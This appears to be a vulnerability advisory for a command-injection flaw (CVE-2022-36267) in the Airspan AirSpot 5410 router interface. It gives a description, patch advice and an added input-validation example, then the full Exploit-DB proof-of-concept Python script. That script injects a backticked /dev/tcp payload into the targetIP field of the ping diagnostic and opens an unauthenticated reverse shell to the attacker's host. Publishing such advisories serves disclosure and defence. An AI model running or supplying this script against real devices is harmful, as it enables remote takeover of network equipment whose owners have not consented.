Vendor: AirSpot 5410
By: Samy Younsi (NSLABS)
CVSS: 9.8 (CRITICAL)
Type: Remote Code Execution (RCE)
CWE: 78
Product Name: AirSpot 5410
Affected Version From: 0.3.4.1-4
Affected Version To: 0.3.4.1-4
Patch Exists: YES
Related CVE: CVE-2022-36267
CPE: a:airspan:airspot_5410
Platforms Tested: Ubuntu
Year: 2022

Airspan AirSpot 5410 version 0.3.4.1 – Remote Code Execution (RCE)

Airspan AirSpot 5410 version 0.3.4.1-4 and under is vulnerable to command injection that allows an attacker to execute arbitrary code on the device. The pingDiagnostic.cgi page does not validate its input, so attacker-supplied text is passed into the ping command that the device runs. The flaw is triggered by a specially crafted POST request; in the PoC below the request goes to /cgi-bin/diagnostics.cgi with Command=pingDiagnostic, and the injected text is carried in the targetIP parameter.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Airspan AirSpot 5410.
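
The input validation that the description says is missing can be expressed as an allow-list check on the ping diagnostic's form fields. The following is an added example, not the vendor's patch and not part of the original advisory; the function names are hypothetical, the field names are the ones visible in the PoC's POST body, and the sample request bodies are constructed.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# One DNS label: starts and ends alphanumeric, so a value can never begin
# with '-' (option injection) or contain shell metacharacters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(r"{0}(?:\.{0})*".format(_LABEL))
_NUMERIC_FIELDS = ("packetSize", "timeOut", "count")


def is_safe_ping_target(value):
    """Allow-list: True only for an IP literal or a plain hostname."""
    if "%" in value:
        # ipaddress accepts IPv6 zone IDs ("fe80::1%eth0") and the zone part
        # is free-form text, so refuse it rather than trust it.
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return len(value) <= 253 and _HOSTNAME.fullmatch(value) is not None


def inspect_ping_request(body):
    """Return 'allow' or 'block' for a urlencoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    if "pingDiagnostic" not in fields.get("Command", []):
        return "allow"  # not the ping diagnostic; outside this check
    targets = fields.get("targetIP", [])
    # Exactly one target, validated after URL decoding.
    if len(targets) != 1 or not is_safe_ping_target(targets[0]):
        return "block"
    for name in _NUMERIC_FIELDS:
        for v in fields.get(name, []):
            if re.fullmatch(r"[0-9]{1,5}", v) is None:
                return "block"
    return "allow"


# Constructed sample bodies: a normal request, and one with text after the IP.
SAMPLES = [
    "Command=pingDiagnostic&targetIP=1.1.1.1&packetSize=55&timeOut=10&count=1",
    "Command=pingDiagnostic&targetIP=1.1.1.1%60id%60&packetSize=55&timeOut=10&count=1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_ping_request(sample), sample)
```

A check like this can run in a reverse proxy in front of the management interface while devices await the update. In the handler itself, the validated value should be passed to ping as a separate argument rather than interpolated into a shell command line.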

Exploit-DB raw data:

# Exploit Title: Airspan AirSpot 5410 version 0.3.4.1 - Remote Code Execution (RCE)
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267

from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def banner():
  airspanLogo = """ 
      ,-.
     / \  `.  __..-,O
    :   \ --''_..-'.'
    |    . .-' `. '.
    :     .     .`.'
     \     `.  /  ..
      \      `.   ' .
       `,       `.   \
      ,|,`.        `-.\
     '.||  ``-...__..-`
      |  | Airspan 
      |__| AirSpot 5410
      /||\ PWNED x_x
     //||\\
    // || \\
 __//__||__\\__
'--------------'Necrum Security Labs
                        
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mAirSpot 5410 CMD INJECTION\033[1;m                                                 
                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(airspanLogo))

def pingWebInterface(RHOST, RPORT):
  url = 'https://{}:{}'.format(RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=30)
    if response.status_code != 200:
      print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    print('[INFO] Airspan device web interface seems reachable!')
  except requests.exceptions.RequestException:
    print('[!] \033[1;91mError: AirSpot 5410 device web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
    exit()


def execReverseShell(RHOST, RPORT, LHOST, LPORT):
  payload = '`sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{}%2F{}%200%3E%261`'.format(LHOST, LPORT)
  data = 'Command=pingDiagnostic&targetIP=1.1.1.1{}&packetSize=55&timeOut=10&count=1'.format(payload)
  try:
    print('[INFO] Executing reverse shell...')
    response = requests.post('https://{}:{}/cgi-bin/diagnostics.cgi'.format(RHOST, RPORT), data=data, verify=False)
    print("Reverse shell successfully executed. {}:{}".format(LHOST, LPORT))
    return
  except Exception as e:
    print("Reverse shell failed. Make sure the AirSpot 5410 device can reach the host {}:{}".format(LHOST, LPORT))
    return False

def main():
  banner()
  args = parser.parse_args()
  pingWebInterface(args.RHOST, args.RPORT)
  execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)


if __name__ == "__main__":
  parser = argparse.ArgumentParser(description='Script PoC that exploits an unauthenticated remote command injection on Airspan AirSpot devices.', add_help=False)
  parser.add_argument('--RHOST', help="Refers to the IP of the target machine. (Airspan AirSpot device)", type=str, required=True)
  parser.add_argument('--RPORT', help="Refers to the open port of the target machine. (443 by default)", type=int, required=True)
  parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)
  parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)
  main()